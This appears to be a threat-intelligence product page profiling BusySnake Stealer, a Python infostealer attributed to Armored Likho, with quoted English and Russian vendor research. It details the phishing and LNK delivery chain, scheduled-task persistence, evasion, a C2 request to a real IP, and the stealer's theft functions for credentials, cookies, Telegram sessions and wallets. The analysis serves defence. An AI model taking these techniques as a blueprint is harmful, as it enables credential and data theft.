Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The group leveraged the ZDI-CAN-25373 shortcut vulnerability to conceal the contents of their command line. This flaw allows the attackers to use spaces or line breaks to hide execution parameters. | The primary payload in this campaign is a previously undocumented, Python-based infostealer that we have dubbed BusySnake Stealer.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Группа использует ранее не описанный инструмент — BusySnake Stealer. Этот стилер написан на Python и предназначен для атак на Windows-системы.
The primary payload in this campaign is a previously undocumented, Python-based infostealer that we have dubbed BusySnake Stealer.
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Одним из ключевых векторов получения первоначального доступа, который злоумышленники активно применяют в своих новых кампаниях, остается фишинг. Armored Likho точечно рассылает письма... распространяли вредоносные вложения в виде архивов...
Armored Likho uses spear-phishing emails, with themes ranging from official government notices to social programs. In their most recent campaign, the attackers distributed malicious attachments inside archive files... These archives contained executables or LNK files named to mimic the email themes, tricking users into executing them on their devices.
Второй скрипт, run.vbs, предназначен для запуска module.pyw и используется для обеспечения закрепления в системе при помощи запланированной задачи... Эта задача обеспечивает запуск полезной нагрузки — BusySnake Stealer — каждые пять минут.
The second script, run.vbs, is designed to execute module.pyw and is used to ensure persistence on the system by creating a scheduled task... This task ensures that the payload, BusySnake Stealer, is executed every five minutes.
После запуска он выполняет обфусцированную команду через rundll32, что приводит к запуску PowerShell-команды для скачивания стейджера.
when the user runs the malicious LNK file, it triggers the following obfuscated command... This, in turn, spawns a PowerShell command that downloads and executes the malicious loader
With all dependencies in place, the malware creates two VBScript files... The second script, run.vbs, is designed to execute module.pyw and is used to ensure persistence on the system by creating a scheduled task
Этот стилер написан на Python... Затем загружается интерпретатор Python версии 3.12... Перед выполнением скрипта происходит установка необходимых зависимостей через pip. Затем запускается новый процесс, и код скрипта выполняется непосредственно в его памяти без записи на диск.
Второй скрипт, run.vbs, предназначен для запуска module.pyw и используется для обеспечения закрепления в системе при помощи запланированной задачи... Эта задача обеспечивает запуск полезной нагрузки — BusySnake Stealer — каждые пять минут.
The stealer’s source code implements multiple evasion techniques... Specifically, the BusySnake Stealer code is obfuscated and encrypted using PyArmor Pro version 9.2.0. The malware dynamically decrypts its bytecode only at the exact moment a function is called, re-encrypting the data immediately afterward.
Далее на диск записывается и запускается легитимный файл $temp\nsn5531.tmp\pnx.exe, после чего в память процесса pnx.exe внедряется код для запуска вредоносного загрузчика.
После запуска он выполняет обфусцированную команду через rundll32, что приводит к запуску PowerShell-команды для скачивания стейджера.
Upon execution, the shortcut runs an obfuscated command via rundll32.exe, which subsequently triggers a PowerShell command to pull down the second-stage payload.
handle_split_and_send_tdata_command Harvests Telegram session and credential data from the APPDATA/Telegram Desktop/tdata directory
handle_collect_and_send_cookies Extracts cookies from browser databases and uploads them to the C2 server... In addition to this method, the stealer fetches a supplementary module designed to extract cookies by installing a browser extension.
The remaining files are then checked: if a file has not been previously sent and its size does not exceed 5 MB, it is transmitted to the C2 server.
take_screenshot Captures screenshots and saves them to the SCREEN_DIR directory... handle_send_screenshots_command Captures screenshots at a designated interval, bundles them into an archive, and exfiltrates them to the C2 server.
Immediately after initialization, the start_key_clipboard_logger function begins harvesting data from the system clipboard. The malware polls the clipboard contents in an infinite loop
GET /get_task?... Host: 159.198.41.140 ... POST /report_status HTTP/1.1 ...
Обновленные конечные точки ... /api/v1/client/{Config.CLIENT_ID}/commands/ ... /tasks/ ... /files/
handle_start_proxy_command ... Устанавливает обратный SSH-туннель ... что обеспечивает удаленный доступ и контроль над скомпрометированной системой.
handle_start_proxy_command / handle_stop_proxy_command Establishes a reverse SSH tunnel using an SSH command and private key previously received from the C2 server.
41 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Python-based infostealer for Windows used by Armored Likho. It establishes persistence via scheduled tasks and VBScript launchers, steals clipboard data, inventories files, extracts 64-character hexadecimal keys, captures screenshots, exfiltrates documents, decrypts Chromium and Firefox passwords, steals cookies, searches for 2FA secrets and wallet files, harvests Telegram session data, and can establish reverse SSH tunnels and execute remotely delivered Python scripts in memory.
Python-based Windows stealer used in phishing-driven intrusions. It establishes persistence via scheduled tasks/VBS, inventories files, steals clipboard data, screenshots, browser passwords and cookies, Telegram session data, OTP secrets, wallet files, and can receive C2 commands including reverse SSH tunneling and remote-control support.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.